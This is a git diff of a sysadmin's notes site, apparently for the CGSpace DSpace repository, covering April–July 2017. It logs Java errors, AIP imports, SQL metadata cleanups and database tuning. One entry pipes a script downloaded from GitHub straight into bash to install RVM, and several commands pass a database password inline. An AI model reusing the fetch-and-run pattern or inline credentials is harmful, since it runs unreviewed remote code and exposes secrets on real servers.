+	at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.ClassNotFoundException: org.dspace.statistics.content.SpecifiedDSODatasetGenerator
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1858)
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1701)
+	at java.lang.Class.forName0(Native Method)
+	at java.lang.Class.forName(Class.java:264)
+	at com.atmire.statistics.statlet.XmlParser.parsedatasetGenerator(SourceFile:299)
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:250)
+	... 13 more
+java.lang.RuntimeException: java.lang.ClassNotFoundException: org.dspace.statistics.content.DSpaceObjectDatasetGenerator
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:254)
+	at org.dspace.statistics.content.StatisticsDisplay.<init>(SourceFile:203)
+	at com.atmire.statistics.display.StatisticsGraph.<init>(SourceFile:116)
+	at com.atmire.statistics.display.StatisticsGraphFactory.getStatisticsDisplay(SourceFile:25)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.parseStatisticsDisplay(SourceFile:67)
+	at com.atmire.statistics.display.StatisticsDisplayFactory.getStatisticsDisplays(SourceFile:49)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:178)
+	at com.atmire.statistics.statlet.XmlParser.getStatisticsDisplays(SourceFile:111)
+	at com.atmire.utils.ReportSender$ReportRunnable.run(SourceFile:151)
+	at java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
+	at java.util.concurrent.FutureTask.run(FutureTask.java:266)
+	at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
+	at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
+	at java.lang.Thread.run(Thread.java:745)
+Caused by: java.lang.ClassNotFoundException: org.dspace.statistics.content.DSpaceObjectDatasetGenerator
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1858)
+	at org.apache.catalina.loader.WebappClassLoaderBase.loadClass(WebappClassLoaderBase.java:1701)
+	at java.lang.Class.forName0(Native Method)
+	at java.lang.Class.forName(Class.java:264)
+	at com.atmire.statistics.statlet.XmlParser.parsedatasetGenerator(SourceFile:299)
+	at com.atmire.statistics.display.StatisticsGraph.parseDatasetGenerators(SourceFile:250)
+
    +
  • Run system updates on DSpace Test and reboot the server (new Java 8 131)
  • +
  • Run the SQL cleanups on the bundle table on CGSpace and run the [dspace]/bin/dspace cleanup task
  • +
  • I will be interested to see the file count in the assetstore as well as the database size after the next backup (last backup size is 111M)
  • +
  • Final file count after the cleanup task finished: 77843
  • +
  • So the cleanup removed about 35,000 files, and about 7GB
  • +
  • Add logging to the cleanup cron task
  • +
+

2017-04-26

+
    +
  • The size of the CGSpace database dump went from 111MB to 96MB, not sure about actual database size though
  • +
  • Update RVM’s Ruby from 2.3.0 to 2.4.0 on DSpace Test:
  • +
+
$ gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3
+$ \curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash -s stable --ruby
+... reload shell to get new Ruby
+$ gem install sass -v 3.3.14
+$ gem install compass -v 1.0.3
+
    +
  • Help Tsega re-deploy the ckm-cgspace-rest-api on DSpace Test
  • +

May, 2017

+ +
+

2017-05-01

+ +

2017-05-02

+
    +
  • Atmire got back about the Workflow Statistics issue, and apparently it’s a bug in the CUA module so they will send us a pull request
  • +
+

2017-05-04

+
    +
  • Sync DSpace Test with database and assetstore from CGSpace
  • +
  • Re-deploy DSpace Test with Atmire’s CUA patch for workflow statistics, run system updates, and restart the server
  • +
  • Now I can see the workflow statistics and am able to select users, but everything returns 0 items
  • +
  • Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b
  • +
  • Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSpace Test) tomorrow: https://cgspace.cgiar.org/handle/10568/80731
  • +
+

2017-05-05

+
    +
  • Discovered that CGSpace has ~700 items that are missing the cg.identifier.status field
  • +
  • Need to perhaps try using the “required metadata” curation task to find fields missing these items:
  • +
+
$ [dspace]/bin/dspace curate -t requiredmetadata -i 10568/1 -r - > /tmp/curation.out
+
    +
  • It seems the curation task dies when it finds an item which has missing metadata
  • +
+
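  • As an alternative to the curation task, a rough SQL sketch to count archived items that have no cg.identifier.status value at all (assuming the field is registered as identifier.status in the metadatafieldregistry):

dspace=# select count(*) from item where in_archive='t' and item_id not in (select resource_id from metadatavalue where resource_type_id=2 and metadata_field_id in (select metadata_field_id from metadatafieldregistry where element='identifier' and qualifier='status'));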

2017-05-06

+ +

2017-05-07

+
    +
  • Testing one replacement for CCAFS Flagships (cg.subject.ccafs), first changed in the submission forms, and then in the database:
  • +
+
$ ./fix-metadata-values.py -i ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p fuuu
+
    +
  • Also, CCAFS wants to re-order their flagships to prioritize the Phase II ones
  • +
  • Waiting for feedback from CCAFS, then I can merge #320
  • +
+

2017-05-08

+
    +
  • Start working on CGIAR Library migration
  • +
  • We decided to use AIP export to preserve the hierarchies and handles of communities and collections
  • +
  • When ingesting some collections I was getting java.lang.OutOfMemoryError: GC overhead limit exceeded, which can be solved by disabling the GC timeout with -XX:-UseGCOverheadLimit
  • +
  • Other times I was getting an error about heap space, so I kept bumping the RAM allocation by 512MB each time (up to 4096m!) it crashed
  • +
  • This leads to tens of thousands of abandoned files in the assetstore, which need to be cleaned up using dspace cleanup -v, or else you’ll run out of disk space
  • +
  • In the end I realized it’s better to use submission mode (-s) to ingest the community object as a single AIP without its children, followed by each of the collections:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx2048m -XX:-UseGCOverheadLimit"
+$ [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10568/87775 /home/aorth/10947-1/10947-1.zip
+$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
+$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
+
+

2017-05-09

+
    +
  • The CGIAR Library metadata has some blank metadata values, which leads to ||| in the Discovery facets
  • +
  • Clean these up in the database using:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+
    +
  • I ended up running into issues during data cleaning and decided to wipe out the entire community and re-sync DSpace Test assetstore and database from CGSpace rather than waiting for the cleanup task to clean up
  • +
  • Hours into the re-ingestion I ran into more errors, and had to erase everything and start over again!
  • +
  • Now, no matter what I do I keep getting foreign key errors…
  • +
+
Caused by: org.postgresql.util.PSQLException: ERROR: duplicate key value violates unique constraint "handle_pkey"
+  Detail: Key (handle_id)=(80928) already exists.
+
    +
  • I think those errors actually come from me running the update-sequences.sql script while Tomcat/DSpace are running
  • +
  • Apparently you need to stop Tomcat!
  • +
+

2017-05-10

+
    +
  • Atmire says they are willing to extend the ORCID implementation, and I’ve asked them to provide a quote
  • +
  • I clarified that the scope of the implementation should be that ORCIDs are stored in the database and exposed via REST / API like other fields
  • +
  • Finally finished importing all the CGIAR Library content, final method was:
  • +
+
$ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx3072m -XX:-UseGCOverheadLimit"
+$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2517/10947-2517.zip
+$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2515/10947-2515.zip
+$ [dspace]/bin/dspace packager -r -a -t AIP -o skipIfParentMissing=true -e some@user.com -p 10568/80923 /home/aorth/10947-2516/10947-2516.zip
+$ [dspace]/bin/dspace packager -s -t AIP -o ignoreHandle=false -e some@user.com -p 10568/80923 /home/aorth/10947-1/10947-1.zip
+$ for collection in /home/aorth/10947-1/COLLECTION@10947-*; do [dspace]/bin/dspace packager -s -o ignoreHandle=false -t AIP -e some@user.com -p 10947/1 $collection; done
+$ for item in /home/aorth/10947-1/ITEM@10947-*; do [dspace]/bin/dspace packager -r -f -u -t AIP -e some@user.com $item; done
+
    +
  • Basically, import the smaller communities using recursive AIP import (with skipIfParentMissing)
  • +
  • Then, for the larger collection, create the community, collections, and items separately, ingesting the items one by one
  • +
  • The -XX:-UseGCOverheadLimit JVM option helps with some issues in large imports
  • +
  • After this I ran the update-sequences.sql script (with Tomcat shut down), and cleaned up the 200+ blank metadata records:
  • +
+
dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
+

2017-05-13

+
    +
  • After quite a bit of troubleshooting with importing cleaned up data as CSV, it seems that there are actually NUL characters in the dc.description.abstract field (at least) on the lines where CSV importing was failing
  • +
  • I tried to find a way to remove the characters in vim or Open Refine, but decided it was quicker to just remove the column temporarily and import it
  • +
  • The import was successful and detected 2022 changes, which should likely be the rest that were failing to import before
  • +
+
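  • For future reference, the NUL characters could probably have been stripped from the CSV on the command line before import, something like this (untested; the filename here is hypothetical):

$ tr -d '\000' < cgiar-library.csv > cgiar-library-clean.csv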

2017-05-15

+
    +
  • To delete the blank lines that cause issues during import we need to use a regex in vim: :g/^$/d
  • +
  • After that I started looking in the dc.subject field to try to pull countries and regions out, but there are too many values in there
  • +
  • Bump the Academicons dependency of the Mirage 2 themes from 1.6.0 to 1.8.0 because the upstream deleted the old tag and now the build is failing: #321
  • +
  • Merge changes to CCAFS project identifiers and flagships: #320
  • +
  • Run updates for CCAFS flagships on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/ccafs-flagships-may7.csv -f cg.subject.ccafs -t correct -m 210 -d dspace -u dspace -p 'fuuu'
+
    +
  • +

    These include:

    +
      +
    • GENDER AND SOCIAL DIFFERENTIATION→GENDER AND SOCIAL INCLUSION
    • +
    • MANAGING CLIMATE RISK→CLIMATE SERVICES AND SAFETY NETS
    • +
    +
  • +
  • +

    Re-deploy CGSpace and DSpace Test and run system updates

    +
  • +
  • +

    Reboot DSpace Test

    +
  • +
  • +

    Fix cron jobs for log management on DSpace Test, as they weren’t catching dspace.log.* files correctly and we had over six months of them and they were taking up many gigs of disk space

    +
  • +
+

2017-05-16

+
    +
  • Discuss updates to WLE themes for their Phase II
  • +
  • Make an issue to track the changes to cg.subject.wle: #322
  • +
+

2017-05-17

+
    +
  • Looking into the error I get when trying to create a new collection on DSpace Test:
  • +
+
ERROR: duplicate key value violates unique constraint "handle_pkey" Detail: Key (handle_id)=(84834) already exists.
+
    +
  • I tried updating the sequences a few times, with Tomcat running and stopped, but it hasn’t helped
  • +
  • It appears item with handle_id 84834 is one of the imported CGIAR Library items:
  • +
+
dspace=# select * from handle where handle_id=84834;
+ handle_id |   handle   | resource_type_id | resource_id
+-----------+------------+------------------+-------------
+     84834 | 10947/1332 |                2 |       87113
+
    +
  • Looks like the max handle_id is actually much higher:
  • +
+
dspace=# select * from handle where handle_id=(select max(handle_id) from handle);
+ handle_id |  handle  | resource_type_id | resource_id
+-----------+----------+------------------+-------------
+     86873 | 10947/99 |                2 |       89153
+(1 row)
+
    +
  • I’ve posted on the dspace-tech mailing list to see if I can just manually set the handle_seq to that value
  • +
  • Actually, it seems I can manually set the handle sequence using:
  • +
+
dspace=# select setval('handle_seq',86873);
+
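  • To avoid hard-coding the value, the sequence could also be set straight from the current maximum (same effect):

dspace=# select setval('handle_seq', (select max(handle_id) from handle));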
    +
  • After that I can create collections just fine, though I’m not sure if it has other side effects
  • +
+

2017-05-21

+
    +
  • Start creating a basic theme for the CGIAR System Organization’s community on CGSpace
  • +
  • Using colors from the CGIAR Branding guidelines (2014)
  • +
  • Make a GitHub issue to track this work: #324
  • +
+

2017-05-22

+
    +
  • Do some cleanups of community and collection names in CGIAR System Management Office community on DSpace Test, as well as move some items as Peter requested
  • +
  • Peter wanted a list of authors in here, so I generated a list of collections using the “View Source” on each community and this hacky awk:
  • +
+
$ grep 10947/ /tmp/collections | grep -v cocoon | awk -F/ '{print $3"/"$4}' | awk -F\" '{print $1}' | vim -
+
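  • Alternatively, the collection handles could probably be pulled from the DSpace 5 REST API instead of scraping the HTML (sketch; the community ID here is a placeholder):

$ curl -s -H "Accept: application/json" "https://dspacetest.cgiar.org/rest/communities/COMMUNITY_ID/collections" | json_pp | grep '"handle"'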
    +
  • Then I joined them together and ran this old SQL query from the dspace-tech mailing list which gives you authors for items in those collections:
  • +
+
dspace=# select distinct text_value
+from metadatavalue
+where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
+AND resource_type_id = 2
+AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
+0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
+47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
+/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
+/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
+'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
+47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
+531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
+, '10947/2537', '10568/93761')));
+
    +
  • To get a CSV (with counts) from that:
  • +
+
dspace=# \copy (select distinct text_value, count(*)
+from metadatavalue
+where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
+AND resource_type_id = 2
+AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
+

2017-05-23

+
    +
  • Add Affiliation to filters on Listing and Reports module (#325)
  • +
  • Start looking at WLE’s Phase II metadata updates but it seems they are not tagging their items properly, as their website importer infers which theme to use based on the name of the CGSpace collection!
  • +
  • For now I’ve suggested that they just change the collection names and that we fix their metadata manually afterwards
  • +
  • Also, they have a lot of messed up values in their cg.subject.wle field so I will clean up some of those first:
  • +
+
dspace=# \copy (select distinct text_value from metadatavalue where resource_type_id=2 and metadata_field_id=119) to /tmp/wle.csv with csv;
+COPY 111
+
    +
  • Respond to Atmire message about ORCIDs, saying that right now we’d prefer to just have them available via REST API like any other metadata field, and that I’m available for a Skype
  • +
+

2017-05-26

+
    +
  • Increase max file size in nginx so that CIP can upload some larger PDFs
  • +
  • Agree to talk with Atmire after the June DSpace developers meeting where they will be discussing exposing ORCIDs via REST/OAI
  • +
+

2017-05-28

+
    +
  • File an issue on GitHub to explore/track migration to proper country/region codes (ISO 2/3 and UN M.49): #326
  • +
  • Ask Peter how the Landportal.info people should acknowledge us as the source of data on their website
  • +
  • Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the June, 2017 DCAT meeting
  • +
  • Find all of Amos Omore’s author name variations so I can link them to his authority entry that has an ORCID:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
+
    +
  • Set the authority for all variations to one containing an ORCID:
  • +
+
dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
+UPDATE 187
+
    +
  • Next I need to do Edgar Twine:
  • +
+
dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
+
    +
  • But it doesn’t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via “Edit this Item” and looked up his ORCID and linked it there
  • +
  • Now I should be able to set his name variations to the new authority:
  • +
+
dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
+
    +
  • Run the corrections on CGSpace and then update discovery / authority
  • +
  • I notice that there are a handful of java.lang.OutOfMemoryError: Java heap space errors in the Catalina logs on CGSpace, I should go look into that…
  • +
+

2017-05-29

+
    +
  • Discuss WLE themes and subjects with Mia and Macaroni Bros
  • +
  • We decided we need to create metadata fields for Phase I and II themes
  • +
  • I’ve updated the existing GitHub issue for Phase II (#322) and created a new one to track the changes for Phase I themes (#327)
  • +
  • After Macaroni Bros update the WLE website importer we will rename the WLE collections to reflect Phase II
  • +
  • Also, we need to have Mia and Udana look through the existing metadata in cg.subject.wle as it is quite a mess
  • +

June, 2017

+ +
+

2017-06-01

+
    +
  • After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes
  • +
  • The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes
  • +
  • Then we’ll create a new sub-community for Phase II and create collections for the research themes there
  • +
  • The current “Research Themes” community will be renamed to “WLE Phase I Research Themes”
  • +
  • Tagged all items in the current Phase I collections with their appropriate themes
  • +
  • Create pull request to add Phase II research themes to the submission form: #328
  • +
  • Add cg.subject.system to CGSpace metadata registry, for subject from the upcoming CGIAR Library migration
  • +
+

2017-06-04

+
    +
  • After adding cg.identifier.wletheme to 1106 WLE items I can see the field on XMLUI but not in REST!
  • +
  • Strangely it happens on DSpace Test AND on CGSpace!
  • +
  • I tried to re-index Discovery but it didn’t fix it
  • +
  • Run all system updates on DSpace Test and reboot the server
  • +
  • After rebooting the server (and therefore restarting Tomcat) the new metadata field is available
  • +
  • I’ve sent a message to the dspace-tech mailing list to ask if this is a bug and whether I should file a Jira ticket
  • +
+

2017-06-05

+
    +
  • Rename WLE’s “Research Themes” sub-community to “WLE Phase I Research Themes” on DSpace Test so Macaroni Bros can continue their testing
  • +
  • Macaroni Bros tested it and said it’s fine, so I renamed it on CGSpace as well
  • +
  • Working on how to automate the extraction of the CIAT Book chapters, doing some magic in OpenRefine to extract page from–to from cg.identifier.url and dc.format.extent, respectively: +
      +
    • cg.identifier.url: value.split("page=", "")[1]
    • +
    • dc.format.extent: value.replace("p. ", "").split("-")[1].toNumber() - value.replace("p. ", "").split("-")[0].toNumber()
    • +
    +
  • +
  • Finally, after some filtering to see which small outliers there were (based on dc.format.extent using “p. 1-14” vs “29 p.”), create a new column with last page number: +
      +
    • cells["dc.page.from"].value.toNumber() + cells["dc.format.pages"].value.toNumber()
    • +
    +
  • +
  • Then create a new, unique file name to be used in the output, based on a SHA1 of the dc.title and with a description: +
      +
    • dc.page.to: value.split(" ")[0].replace(",","").toLowercase() + "-" + sha1(value).get(1,9) + ".pdf__description:" + cells["dc.type"].value
    • +
    +
  • +
  • Start processing 769 records after filtering the following (there are another 159 records that have some other format, or for example they have their own PDF which I will process later), using a modified generate-thumbnails.py script to read certain fields and then pass to GhostScript: +
      +
    • cg.identifier.url: value.contains("page=")
    • +
    • dc.format.extent: or(value.contains("p. "),value.contains(" p."))
    • +
    • Command like: $ gs -dNOPAUSE -dBATCH -dFirstPage=14 -dLastPage=27 -sDEVICE=pdfwrite -sOutputFile=beans.pdf -f 12605-1.pdf
    • +
    +
  • +
  • 17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF
  • +
  • I’ve flagged them and proceeded without them (752 total) on DSpace Test:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
+
    +
  • I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)
  • +
  • Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT
  • +
  • Restart Tomcat on CGSpace so that the cg.identifier.wletheme field is available on REST API for Macaroni Bros
  • +
+

2017-06-07

+
    +
  • Testing Atmire’s patch for the CUA Workflow Statistics again
  • +
  • Still doesn’t seem to give results I’d expect, like there are no results for Maria Garruccio, or for the ILRI community!
  • +
  • Then I’ll file an update to the issue on Atmire’s tracker
  • +
  • Created a new branch with just the relevant changes, so I can send it to them
  • +
  • One thing I noticed is that there is a failed database migration related to CUA:
  • +
+
+----------------+----------------------------+---------------------+---------+
+| Version        | Description                | Installed on        | State   |
++----------------+----------------------------+---------------------+---------+
+| 1.1            | Initial DSpace 1.1 databas |                     | PreInit |
+| 1.2            | Upgrade to DSpace 1.2 sche |                     | PreInit |
+| 1.3            | Upgrade to DSpace 1.3 sche |                     | PreInit |
+| 1.3.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.4            | Upgrade to DSpace 1.4 sche |                     | PreInit |
+| 1.5            | Upgrade to DSpace 1.5 sche |                     | PreInit |
+| 1.5.9          | Drop constraint for DSpace |                     | PreInit |
+| 1.6            | Upgrade to DSpace 1.6 sche |                     | PreInit |
+| 1.7            | Upgrade to DSpace 1.7 sche |                     | PreInit |
+| 1.8            | Upgrade to DSpace 1.8 sche |                     | PreInit |
+| 3.0            | Upgrade to DSpace 3.x sche |                     | PreInit |
+| 4.0            | Initializing from DSpace 4 | 2015-11-20 12:42:52 | Success |
+| 5.0.2014.08.08 | DS-1945 Helpdesk Request a | 2015-11-20 12:42:53 | Success |
+| 5.0.2014.09.25 | DS 1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2014.09.26 | DS-1582 Metadata For All O | 2015-11-20 12:42:55 | Success |
+| 5.0.2015.01.27 | MigrateAtmireExtraMetadata | 2015-11-20 12:43:29 | Success |
+| 5.0.2017.04.28 | CUA eperson metadata migra | 2017-06-07 11:07:28 | OutOrde |
+| 5.5.2015.12.03 | Atmire CUA 4 migration     | 2016-11-27 06:39:05 | OutOrde |
+| 5.5.2015.12.03 | Atmire MQM migration       | 2016-11-27 06:39:06 | OutOrde |
+| 5.6.2016.08.08 | CUA emailreport migration  | 2017-01-29 11:18:56 | OutOrde |
++----------------+----------------------------+---------------------+---------+
+
+
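  • That table looks like the output of DSpace’s database utility, so (assuming the DSpace 5.x database commands) the Flyway state could be inspected and carefully repaired with:

$ [dspace]/bin/dspace database info
$ [dspace]/bin/dspace database repair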

2017-06-18

+
    +
  • Redeploy CGSpace with latest changes from 5_x-prod, run system updates, and reboot the server
  • +
  • Continue working on ansible infrastructure changes for CGIAR Library
  • +
+

2017-06-20

+
    +
  • Import Abenet and Peter’s changes to the CGIAR Library CRP community
  • +
  • Due to them using Windows and renaming some columns there were formatting, encoding, and duplicate metadata value issues
  • +
  • I had to remove some fields from the CSV and rename some back to, e.g., dc.subject[en_US] just so DSpace would detect the changes properly
  • +
  • Now it looks much better: https://dspacetest.cgiar.org/handle/10947/2517
  • +
  • Removing the HTML tags and HTML/XML entities using the following GREL: +
      +
    • replace(value,/<\/?\w+((\s+\w+(\s*=\s*(?:".*?"|'.*?'|[^'">\s]+))?)+\s*|\s*)\/?>/,'')
    • +
    • value.unescape("html").unescape("xml")
    • +
    +
  • +
  • Finally import 914 CIAT Book Chapters to CGSpace in two batches:
  • +
+
$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
+$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &> /tmp/ciat-books2.log
+

2017-06-25

+
    +
  • WLE has said that one of their Phase II research themes is being renamed from Regenerating Degraded Landscapes to Restoring Degraded Landscapes
  • +
  • Pull request with the changes to input-forms.xml: #329
  • +
  • As of now it doesn’t look like there are any items using this research theme so we don’t need to do any updates:
  • +
+
dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
+ text_value
+------------
+(0 rows)
+
    +
  • Marianne from WLE asked if they can have both Phase I and II research themes together in the item submission form
  • +
  • Perhaps we can add them together in the same question for cg.identifier.wletheme
  • +
+

2017-06-30

+
    +
  • CGSpace went down briefly; I see lots of these errors in the dspace logs:
  • +
+
Java stacktrace: java.util.NoSuchElementException: Timeout waiting for idle object
+
    +
  • After looking at the Tomcat logs, Munin graphs, and PostgreSQL connection stats, it seems there is just a high load
  • +
  • Might be a good time to adjust DSpace’s database connection settings, like I first mentioned in April, 2017 after reading the 2017-04 DCAT comments
  • +
  • I’ve adjusted the following in CGSpace’s config: +
      +
    • db.maxconnections 30→70 (the default PostgreSQL config allows 100 connections, so DSpace’s default of 30 is quite low)
    • +
    • db.maxwait 5000→10000
    • +
    • db.maxidle 8→20 (DSpace default is -1, unlimited, but we had set it to 8 earlier)
    • +
    +
  • +
  • We will need to adjust this again (as well as the pg_hba.conf settings) when we deploy Tsega’s REST API
  • +
  • Whip up a test for Marianne of WLE to be able to show both their Phase I and II research themes in the CGSpace item submission form:
  • +
+

Test A for displaying the Phase I and II research themes
Test B for displaying the Phase I and II research themes

diff --git a/docs/2017-07/index.html b/docs/2017-07/index.html
new file mode 100644
index 000000000..ef1689539
--- /dev/null
+++ b/docs/2017-07/index.html
@@ -0,0 +1,329 @@

July, 2017 | CGSpace Notes

July, 2017

+ +
+

2017-07-01

+
    +
  • Run system updates and reboot DSpace Test
  • +
+

2017-07-04

+
    +
  • Merge changes for WLE Phase II theme rename (#329)
  • +
  • Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
  • +
  • We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
  • +
+
$ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::'
+
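  • For illustration, each record comes out wrapped roughly like this (the values here are made up):

<dc-type>
<schema>cg</schema>
  <element>coverage</element>
  <qualifier>region</qualifier>
  <scope_note>Region of the content</scope_note>
</dc-type>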
    +
  • The sed script is from a post on the PostgreSQL mailing list
  • +
  • Abenet says the ILRI board wants to be able to have “lead author” for every item, so I’ve whipped up a WIP test in the 5_x-lead-author branch
  • +
  • It works but is still very rough and we haven’t thought out the whole lifecycle yet
  • +
+

Testing lead author in submission form

+
    +
  • I assume that “lead author” would actually be the first question on the item submission form
  • +
  • We also need to check to see which ORCID authority core this uses, because it seems to be using an entirely new one rather than the one for dc.contributor.author (which makes sense of course, but fuck, all the author problems aren’t bad enough?!)
  • +
  • Also would need to edit XMLUI item displays to incorporate this into authors list
  • +
  • And fuck, then anyone consuming our data via REST / OAI will not notice that we have an author outside of dc.contributor.authors… ugh
  • +
  • What if we modify the item submission form to use type-bind fields to show/hide certain fields depending on the type?
  • +
+
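  • For reference, input-forms.xml field definitions support a type-bind element, so a rough sketch (the “Book” value and the field itself are just examples) could be:

<field>
    <!-- existing dc-schema, dc-element, label, input-type, etc. -->
    <type-bind>Book</type-bind>
</field>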

2017-07-05

+
    +
  • Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (#330)
  • +
  • Generate list of fields in the current CGSpace cg scheme so we can record them properly in the metadata registry:
  • +
+
$ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::' > cg-types.xml
+
    +
